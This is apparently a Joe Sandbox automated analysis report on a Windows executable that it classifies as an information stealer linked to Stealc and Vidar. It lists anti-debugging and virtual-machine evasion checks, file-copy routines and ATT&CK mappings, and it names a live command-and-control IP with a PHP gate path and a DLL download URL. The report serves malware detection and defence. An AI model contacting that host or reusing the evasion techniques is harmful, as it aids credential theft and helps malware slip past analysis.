                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D0CE second address: 64D11D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 jng 00007F55E4D1D31Eh 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F55E4D1D2E7h 0x00000016 jp 00007F55E4D1D2D6h 0x0000001c popad 0x0000001d pushad 0x0000001e jnp 00007F55E4D1D2D6h 0x00000024 jmp 00007F55E4D1D2E7h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE049E second address: 4CE04A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE04A2 second address: 4CE04A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE04A6 second address: 4CE04AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE04AC second address: 4CE0512 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F55E4D1D2E6h 0x0000000f push eax 0x00000010 jmp 00007F55E4D1D2DBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F55E4D1D2E6h 0x0000001b mov ebp, esp 0x0000001d jmp 00007F55E4D1D2E0h 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov ebx, ecx 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE0568 second address: 4CE057D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D05131h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE057D second address: 4CE05A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F55E4D1D2DEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE05A9 second address: 4CE05AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE05AD second address: 4CE05CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C407 second address: 56C41D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007F55E4D05126h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jp 00007F55E4D05130h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C59B second address: 56C5A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C730 second address: 56C741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F55E4D0512Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3BDD49 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 562A65 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5EE7EF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe  Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe  Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe  Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exe  Evaded block: after key decision  graph_0-37758
                Source: all processes  Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000E40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose  0_2_000E40F0
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000DE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA  0_2_000DE530
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000D1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose  0_2_000D1710
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000DF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose  0_2_000DF7B0
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000E47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen  0_2_000E47C0
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000E3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose  0_2_000E3B00
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000E4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose  0_2_000E4B60
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000DDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose  0_2_000DDB80
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000DEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose  0_2_000DEE20
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000DBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose  0_2_000DBE40
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000DDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose  0_2_000DDF10
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000D1160 GetSystemInfo,ExitProcess  0_2_000D1160
                Source: file.exe, file.exe, 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp  Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1743848806.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: VMwareVMware6
                Source: file.exe, 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp  Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1743848806.0000000000D75000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW`
                Source: C:\Users\user\Desktop\file.exe  API call chain: ExitProcess graph end node  graph_0-36573
                Source: C:\Users\user\Desktop\file.exe  API call chain: ExitProcess graph end node  graph_0-36570
                Source: C:\Users\user\Desktop\file.exe  API call chain: ExitProcess graph end node  graph_0-36591
                Source: C:\Users\user\Desktop\file.exe  API call chain: ExitProcess graph end node  graph_0-36625
                Source: C:\Users\user\Desktop\file.exe  API call chain: ExitProcess graph end node  graph_0-36459
                Source: C:\Users\user\Desktop\file.exe  API call chain: ExitProcess graph end node  graph_0-36585
                Source: C:\Users\user\Desktop\file.exe  System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe  Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe  Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe  Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe  Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe  Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe  Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe  Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe  Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe  Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe  Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe  File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe  File opened: SICE
                Source: C:\Users\user\Desktop\file.exe  File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe  Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe  Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe  Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000D4610 VirtualProtect ?,00000004,00000100,00000000  0_2_000D4610
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000E9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress  0_2_000E9BB0
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000E9AA0 mov eax, dword ptr fs:[00000030h]  0_2_000E9AA0
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000E7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA  0_2_000E7690
                Source: all processes  Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe  Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match  File source: Process Memory Space: file.exe PID: 7092, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000E9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle  0_2_000E9790
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000E98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle  0_2_000E98E0
                Source: file.exe, file.exe, 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp  Binary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00117588 cpuid  0_2_00117588
                Source: C:\Users\user\Desktop\file.exe  Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree  0_2_000E7D20
                Source: C:\Users\user\Desktop\file.exe  Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000E7B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA  0_2_000E7B10
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000E79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA  0_2_000E79E0
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_000E7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA  0_2_000E7BC0

                Stealing of Sensitive Information

                Source: Yara match  File source: 0.2.file.exe.d0000.0.unpack, type: UNPACKEDPE
                Source: Yara match  File source: 00000000.00000003.1698160628.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match  File source: 00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: Process Memory Space: file.exe PID: 7092, type: MEMORYSTR
                Source: Yara match  File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match  File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match, File source: 0.2.file.exe.d0000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000003.1698160628.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: file.exe PID: 7092, type: MEMORYSTR
                Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match, File source: dump.pcap, type: PCAP
                MITRE ATT&CK matrix, listed per tactic column (the number in front of a technique is the count shown for it in the matrix cell):

                • Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
                • Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
                • Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
                • Execution: 2 Command and Scripting Interpreter, 12 Native API, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
                • Persistence: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                • Privilege Escalation: 11 Process Injection, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                • Defense Evasion: 1 Masquerading, 33 Virtualization/Sandbox Evasion, 11 Disable or Modify Tools, 11 Process Injection, 1 Deobfuscate/Decode Files or Information, 3 Obfuscated Files or Information, 12 Software Packing, 1 DLL Side-Loading
                • Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
                • Discovery: 2 System Time Discovery, 641 Security Software Discovery, 33 Virtualization/Sandbox Evasion, 13 Process Discovery, 1 Account Discovery, 1 System Owner/User Discovery, 1 File and Directory Discovery, 334 System Information Discovery
                • Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
                • Collection: 1 Archive Collected Data, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
                • Command and Control: 2 Encrypted Channel, 2 Ingress Tool Transfer, 2 Non-Application Layer Protocol, 12 Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
                • Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
                • Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Source | Detection | Scanner | Label
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe
                http://185.215.113.206 | 20% | Virustotal |
                http://185.215.113.206/6c4adf523b719729.php | 21% | Virustotal |
                http://185.215.113.206/ | 20% | Virustotal |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.php | true | | unknown
                http://185.215.113.206/ | true | | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.php/% | file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206 | file.exe, 00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.206$P | file.exe, 00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206G | file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.php7) | file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.phpG | file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                https://docs.rs/getrandom#nodejs-es-module-support | file.exe, 00000000.00000003.1698160628.0000000004B7B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
                          IP | Domain | Country | ASN | ASN Name | Malicious
                          185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1546537
                          Start date and time:2024-11-01 05:00:07 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 15s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of new started processes analysed:1
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 135
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          No simulations
                          Match | Associated Sample Name / URL | Detection | Threat Name | Context
                          185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php
                          185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                          185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php
                          185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                          185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                          185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php
                          185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php
                          185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                          185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                          185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/746f34465cf17784/sqlite3.dll
                          No context
                          Match | Associated Sample Name / URL | Detection | Threat Name | Context
                          WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
                          WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
                          WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
                          WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
                          WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
                          No context
                          No context
                          No created / dropped files found
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.961389881797388
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:2'137'600 bytes
                          MD5:212e008d0b8a1d4874846987f37e34fa
                          SHA1:0c125b1139dbbb0aa2fedfb916d1365001cce1e9
                          SHA256:d9d47fd94a18e02cb473ec8ed22d7d7f6ce79825f999d129d662f71409a48082
                          SHA512:f2d886ef7cedc828234029b48bb146c449ecdf7d2d293c759af6dc61f873fe873be5cbea21b9c07fd6ed868aa8b32cba804b79bd788475f53490b54872e7d0d6
                          SSDEEP:49152:uGVhpyQho3PpnAE1ktGuQXdOS98NNT/tspRkYlQ3Yr2We5Vz+:hHouyWGuQNOS98NLCMYcD+
                          TLSH:98A533AB5918B21FDCCFC378F84B56EA236D8977CCD50E760A9E971829576306833470
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                          Icon Hash:90cececece8e8eb0
                          Entrypoint:0xb28000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                          Instruction
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          (no name) | 0x1000 | 0x2e7000 | 0x67600 | c452cd91279590bceaf8cb254b9dcc60 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          (no name) | 0x2ea000 | 0x29e000 | 0x200 | 00b1fa9da4b124b29ef6dc7676b30fc2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          cbbjugzk | 0x588000 | 0x19f000 | 0x19ee00 | c516e81a0b9a596fc44e860655191620 | False | 0.9947032003238927 | data | 7.953118561919161 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          lfmofsyx | 0x727000 | 0x1000 | 0x400 | e1efcaf2dd45435f7b059c61f63c83a1 | False | 0.8662109375 | data | 6.483364564858445 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant | 0x728000 | 0x3000 | 0x2200 | b5f77a543fd20da36992272eb3d755d8 | False | 0.07364430147058823 | DOS executable (COM) | 0.9636343475363153 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          DLL | Import
                          kernel32.dll | lstrcpy
